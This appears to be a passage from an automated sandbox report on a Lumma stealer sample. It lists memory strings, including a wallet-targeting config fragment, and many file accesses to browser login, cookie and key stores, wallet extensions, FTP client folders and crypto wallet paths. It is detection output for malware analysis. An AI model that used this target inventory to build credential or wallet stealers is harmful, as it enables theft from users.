Source: lumma_phothockey.exe, 00000004.00000002.3760812140.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrol
Source: lumma_phothockey.exe, 00000004.00000002.3760812140.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrol
Source: lumma_phothockey.exe, 00000004.00000002.3760812140.0000000000810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :[""],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%localappdata%\\Coinomi\\Coinomi\\wallets","m":[""],"z":"Wallets/Coinomi","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Authy Desktop\\Local Storage\\leveldb","m":[""],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":[""],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":[""],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":[""],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrol
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: lumma_phothockey.exe, 00000000.00000002.1577103994.0000000007090000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\IZMFBFKMEB	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\IZMFBFKMEB	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\IZMFBFKMEB	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\IZMFBFKMEB	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\SNIPGPPREP	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\IZMFBFKMEB	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Directory queried: C:\Users\user\Documents\IZMFBFKMEB	Jump to behavior

Source: Yara match

